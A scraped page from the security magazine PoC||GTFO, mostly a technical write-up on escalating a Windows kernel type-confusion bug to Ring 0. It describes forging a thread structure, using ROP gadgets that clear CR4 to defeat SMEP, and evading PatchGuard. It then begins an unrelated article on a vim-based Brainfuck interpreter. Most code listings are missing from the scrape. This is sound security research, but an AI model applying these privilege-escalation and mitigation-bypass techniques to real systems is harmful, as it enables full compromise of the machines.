PoC or GTFO, Volume 2

Home > Other > PoC or GTFO, Volume 2 > Page 31
PoC or GTFO, Volume 2 Page 31

by Manul Laphroaig


  Note that in Windows 10, steps 13 to 16 are only performed if the new thread is not a system thread, which is indicated by the SystemThread flag in the KTHREAD.

  Finally, now having returned back in KiSwapContext again, the RESTORE_EXCEPTION_FRAME macro is used to pop off all non-volatile register state from the stack frame.

  Coda

  With the sequence of steps performed by the context switch now exposed, taking control of a thread is an easy matter of controlling its KernelStack field in the KTHREAD. As soon as the RSP value is set to this location, the eventual ret instruction will get us wherever we need to go, with full Ring 0 privileges, as a typical ROP-friendly instruction.

  Even more, if we return to KiSwapContext (assuming we have an information leak) we have the RESTORE_EXCEPTION_FRAME macro, which will take care of everything but RAX, RCX, and RDX for us. We can of course return anywhere else we’d like and build our own ROP chain.

  PoC

  Let’s look at the code that implements everything we’ve just seen. First, we need to hard-code our current user-mode thread to run only on the first CPU of Group 0 (always CPU 0). The reason for this will become obvious shortly:

  Next, let us create an active wait any wait block, associated with an arbitrary thread:

  Then we create a Synchronization Event, which is currently tied to this wait block:

  All right! We now have our event and wait block. It’s tied to the deathThread, so let’s go fill that out. First, we give this thread the correct hard affinity (i.e., the one we just set for ourselves) and soft affinity (i.e., the ideal processor). Note that the ideal processor is expressed as the raw processor index, which is not available to user-mode. Therefore, by forcing our thread to run on Group 0 earlier, we can guarantee that the CPU Index 0 matches Processor 0.

  Now we know this thread will run on the same processor we’re on, but we want to guarantee it will pre-empt us. In other words, we need to bump up its priority higher than ours. We could pick any number higher than the current priority, but we’ll pick 31 for two reasons. First, it’s practically guaranteed to pre-empt anything on this processor, and second, it’s in the so-called real-time range which means it’s not subject to priority adjustments and quantum tracking, which will make the scheduler’s job easier when getting this thread in a runnable state (and avoid us having to define more state).

  deathThread.Priority = 31;

  Okay, so if we’re going to claim that our event object is being waited on by this thread, we better make the thread appear as if it’s in a committed waiting state with one wait block—the one with which the event is associated.

  Excellent! For the context switch routine to work correctly, we also need to make it look like this thread is in the same process as the current thread. Otherwise, our address space will become invalid, and all sorts of other crashes will occur. In order to do this, we need to know the kernel pointer of the current process, or KPROCESS structure. Thankfully, there exists a variety of documented information leaks in the kernel that will allow us to obtain this information. One common technique is to open a handle to our own process ID and then enumerate our own handle table until we find a match for the handle number. The Windows API will then contain the kernel address of the object associated with this handle (i.e., our very own process!).

  deathThread.ApcState.Process = addrProcess;

  Last, but not least, we need to set up the kernel stack, which should be pointing to a KSWITCH_FRAME. And we need to confirm that the stack truly is resident, as per our discoveries above. The switch frame has a return address, which we are free to set to any address we’d like to ROP into.

  Actually, let’s not forget that we also need to have a valid FPU stack, so that the FPU/XSAVE restore can work when context switching. One easy to way to do this is as follows:

  Once all these operations are done, we have a fully exploitable event object, which will get us to “exploitGadget.” But what should that be?

  ACT II. The Right Gadget and Cleanup

  ROPing to User-Mode

  Once we’ve established control over RIP/RSP, it’s time to actually extract some use out of this ability. As we’re not going to be injecting executable code in the kernel,51 the best place to direct RIP is in user mode. Sadly, modern mitigations such as SMEP make this impossible, and any attempt to execute our user-mode code will result in a nasty crash. Fortunately, SMEP is a CPU feature that must be enabled by software, and it relies on a particular flag in the CR4 to be set. All we need is the right ROP gadget to turn that flag off. As it happens, the function to flush the current TLB is inlined throughout the kernel, which results in the following assembly sequence when it’s done at the end of a function:

  Well, now all that we’re missing is a gadget to load the right value into RCX. This isn’t hard, and for example, the KeRemoveQueueDpcEx function, which is exported, has exactly what we need:

  With these two simple gadgets, we can control and fill out the KEXCEPTION_FRAME that’s supposed to be right on top of the KSWITCH_FRAME as follows:

  Consistency and Recovery

  Imagine yourself in Stage1Payload now. Your KPRCB’s Current-Thread field points to a user-mode KTHREAD inside of your own personal address space. Your RSP (and your KTHREAD’s RSP and TSS’s RSP0) are also pointing to some user-mode buffer that’s only valid inside your address space. All it takes is a another thread on another processor scouring the CPU queues (trying to figure out who to pre-empt) and dereferencing the death thread, before a crash occurs. And let me tell you, that happens. . . a lot! Our first order of business should therefore be to allocate some sort of globally visible kernel memory where we can store the KTHREAD we’ve built for ourselves. But the mere act of allocating memory will take a relatively long time, and chances are high we’ll crash early.

  So we’ll take a page out of some very early NT rootkits. Taking advantage of the fact that the KUSER_SHARED_DATA structure has a fixed, global address on all Windows machines and is visible in all processes. It’s got just enough slack space to fit our KTHREAD structure too! As soon as that’s done, we want to update the KPRCB’s CurrentThread to point to this new copy. The code looks something like this:

  Although unlikely, a race condition is still possible right before the copy completes. One could avoid this by creating a user-mode process that creates priority 31 threads on all processors but the current one, spinning forever, until the exploit completes. That will remove any occurrences of processor queue scanning.

  At this point, we can now attack the kernel in any way we want, but once we’re done, what happens to this thread? We could attempt to terminate it with PsTerminateSystemThread, but a number of things are likely to go wrong—namely that we aren’t a system thread (but we could fix that by setting the right KTHREAD flag). Even beyond that, however, the API would attempt to access a number of additional KTHREAD and KPROCESS fields, dereference the thread object as an ETHREAD (which we haven’t built), and require an amount of information leaks so great that it is unlikely to ever work. Entering a tight spin loop would fix these problems, but the CPU would be pegged down forever, and a single-core machine would simply lock up.

  We’ve seen, however, that we have enough of a KTHREAD to exit the scheduler and even be context-switched in. Do we have enough to enter the scheduler and be context-switched out? The simplest way to do so is to use the KeDelayExecutionThread API and pass in an absurdly large timeout value—guaranteeing our thread will be stuck in a wait state forever.

  Before doing so, however, we should remember that all dispatching operations happen at DISPATCH_LEVEL, as we saw earlier. And normally, the exit from SwapContext would’ve resulted in returning back to some function that had raised the IRQL, so that it could then lower it. We are not allowed to re-enter the scheduler at this IRQL, so we’ll first lower it back down to PASSIVE_LEVEL ourselves. Our final cleanup code thus looks like this:

  Enter PatchGuard

  Readers of this magazine ought
to know that Skape and Skywing aren’t idiots—their PatchGuard technology embedded into the NT kernel will actually actively scan for changes to KUSER_-SHARED_DATA. Any modification such as our addition of a random KTHREAD in its tail will result in the famous 109 BSOD, with a code of “0” or “Generic Data Modification.”

  Thus, we need to clear out our KTHREAD from there—but that poses a problem since we can’t destroy the KTHREAD before we call KeDelayExecutionThread. One option is to allocate some non-paged pool memory and copy our KTHREAD structure in there, then modify the KPRCB CurrentThread pointer yet again. But this means that we will be leaking a KTHREAD in memory forever. Can we do better?

  Another possibility is to do the destruction of the KTHREAD after the KeDelayExecutionThread has executed. Nobody will ever need to look at, or touch the structure, since we know it will never wake up again. But how can we run after the endless delay? Clearly, we need another activation point—and Windows offers timer-based deferred procedure routines (DPCs) as a solution. By allocating a nonpaged pool buffer containing a KTIMER structure (initialized with KeInitializeTimer) and a KDPC structure (initialized with KeInitializeDpc), we can then use KeSetTimer to force the execution of the DPC to, say, five seconds later in time. This is easy to do.

  Inside of the CleanDpc routine, we simply destroy the thread and free the data:

  With the KUSER_SHARED_DATA structure cleaned up, we should never hear from PatchGuard again. And so, the system is now restored back to sanity—except for the case when a few seconds later, some thread, on some arbitrary processor, inserts a new timer in the tree of timers. The scheduler, after computing a 256-based hash bucket handle for the KTIMER entry, inserts it into the list of existing KTIMER structures that share the same hash—that, with a probability of 1/256, is the near-infinitely expiring timer that KeDelayExecutionThread is using. Why is this a problem, you ask?

  Well, as it happens, the kernel doesn’t want to have to create a timer object whenever a wait is done that involves a timeout. And so, any time that a synchronization object is waited upon for a fixed period of time, or any time that a Sleep/KeDelayExecutionThread call is performed, an internal KTIMER structure that is preallocated in the KTHREAD structure is used, under the field name Timer. This also creates one of the NT kernel’s best-designed features: the ability to wait on objects without requiring a single memory allocation.

  Unfortunately for us as attackers, this means that the timer table now contains a pointer to what is essentially computable as KUSER_SHARED_DATA + sizeof(KUSER_SHARED_DATA) + FIELD_-OFFSET(KTHREAD, Timer))... a data structure that we have completely zeroed out. That list of hash entries will therefore hit a null pointer and crash.52 We must then do one more thing in the CleanDpc routine, remove this linkage. We can do this easily.

  RemoveEntryList(&newThread->Timer.TimerListEntry);

  PatchGuard Redux

  Remember the part about Patchguard’s developers not being stupid? Well, they’re certainly not going to let the corrupt, SMEP-disabled value of CR4 stand! And so it is, that after a few minutes (or less), another 109 BSOD is likely to appear, this time with code 15. (“Critical processor register modified.”) Hence, this is one more thing that we’re going to have to clean up, and yet again something that we cannot do as part of our user-mode pre-KeDelayExecutionThread call, because the very next instruction would then issue a SMEP violation. Good thing we’ve got our five second timer-based DPC!

  Except that things are never that easy, as readers probably know. One of the great (or terrible) things about DPCs is that they run in arbitrary thread context and don’t have a particular affinity to a given processor either, unless told otherwise. While in a normal interrupt service routine environment, the DPC will typically execute on the same processor it was queued on, this is not the case with timer-based DPCs. In fact, on most systems, these will execute on CPU 0 at all times, whereas on others, they can be distributed across processors based on utilization and power needs. Why is this a problem? Because we’ve disabled SMEP on one particular processor—the one that ran our first-stage user-mode payload, while the DPC can run on a completely different processor.

  As always, the NT kernel offers up an API as a solution. By using KeSetTargetProcessorDpcEx, we can make sure the DPC runs on the same processor as our first stage payload (which should be CPU 0, Group 0, but let’s do this in a more portable way):

  Success is now ours! By cleaning up the KUSER_SHARED_DATA structure, eliminating the KTHREAD’s timer from the timer list, and restoring CR4 back to its original value, the system is now fully restored in its original state, and we’ve even freed the KDPC and KTIMER structures. There’s now not a single trace of the thread left around, which pretty much amounts to the initial idea of terminating the thread. From dust we made it, and to dust it returned.

  Of course, our payload hasn’t actually done anything, other than clean up after itself. Obviously, at this point, any number of actually real system threads could be created, periodic timer DPCs could be queued, work items can be queued, and all other arbitrary kernel-mode operations are permitted, depending on the ultimate goals of our exploit.

  ACT III. Denoument

  The Trigger

  We have so far been operating in an imaginary world where we can send the kernel an arbitrary Event Object as a KEVENT and have the kernel attempt to signal it. We now have shown that this scenario can reliably lead to kernel execution. The next question is, how can we trigger it?

  As it happens, the kernel has a function called PopUmpoProcessPowerMessage, which responds to any message that is sent to the ALPC port that it creates, called PowerPort. Such messages have a simple 4-byte header indicating their type, and a type of 7, which we’ll call PowerMessageNotifyLegacyEvent, and is treated as follows:

  To send messages to this port, a complex series of actions and ALPC-specific setup, plus somehow getting access to this port, must be performed. Thankfully, we don’t need to do any of it, as the UMPO.DLL library, which implements the User Mode Power Manager, exports a handy UmpoAlpcSendPowerMessage function. By simply injecting a DLL into the service, which contains all of the above code implementation, we can execute the following sequence to trigger a Ring 3 to Ring 0 jump:

  Conclusion

  As we’ve seen in this analysis, sometimes even the most apparently unexploitable data corruption/type confusion bugs can sometimes be busted open with sufficient understanding of the underlying operating system and rules around the particular data. I’m aware of another vulnerability that results in control of a lock object—which, when fixed, was assumed to be nothing more than a DoS. I posit that such a lock object could’ve also been maliciously constructed to appear in an non-acquired state, which would then cause the kernel to make the thread acquire the lock—meanwhile, with a race condition, the lock could’ve been made to appear contended, such as to cause the release path to signal the contention even, and ultimately lead to the same exploitation path as discussed here.

  It is also important to note that such data corruption vulnerabilities, which can lead to stack pivoting and ROP into user mode will bypass technologies such as DeviceGuard, even if configured with HyperVisor Code Integrity (HVCI)—due to the fact that all pages executing here will be marked as executable. All that is needed is the ability to redirect execution to the UMPO function, which could be done if User-Mode UMCI is disabled, or if PowerShell is enabled without script protection—one can reflectively inject and redirect execution of the Svchost.exe process. Note, however, that enabling HVCI will activate HyperGuard, which protects the CR4 register and prevents turning off SMEP. This must be bypassed by a more complex exploit technique either affecting the PTEs or making the kernel payload itself be full ROP.

  Finally, Windows Redstone 14352 and later fix this issue, just in time for the publication of the article. This fix will not be back-ported as it does not meet the bulletin bar, however.

  12:9 A VIM Execution Engine

  by Chris Domas
/>   The power of vim is known far and wide, yet it is only when we push the venerable editor to its limits that we truly see its beauty. To conclusively demonstrate vim’s majesty, and silence heretical doubters, let us construct a copy/paste/search/replace Turing machine, using vanilla vim commands.

  First, we lay some ground rules. Naturally, we could build a Turing machine using the built-in vimscript, but it is already known that vimscript is Turing-complete, and this is hardly sporting. vim ex commands—the requests we make from vim when we type a colon—are abundant and powerful, but these too would make the task simple, and therefore would fail to illustrate the glory of vim. Instead, we strive to limit ourselves to normal vim commands: yank, put, delete, search, and the like.

  With these constraints in mind, we must decide on the design of our machine. For simplicity, let us implement an interpreter for the widely known Brainfuck (BF) programming language. Our machine will be a simple text file that, when opened in vim and started with a few key presses, interprets BF code through copy-/paste/search/replace style vim commands.

  Let us begin by giving our machine some memory. We create data tape in the text file by simply adding the following:

  _t :

  0 0 0 0 0 0 0 0 0 0

  We now have ten data cells, which we can locate by searching for _t.

  Now what of the BF code itself? Let us add a Fibonacci number generator to the file.

  _p :

 

‹ Prev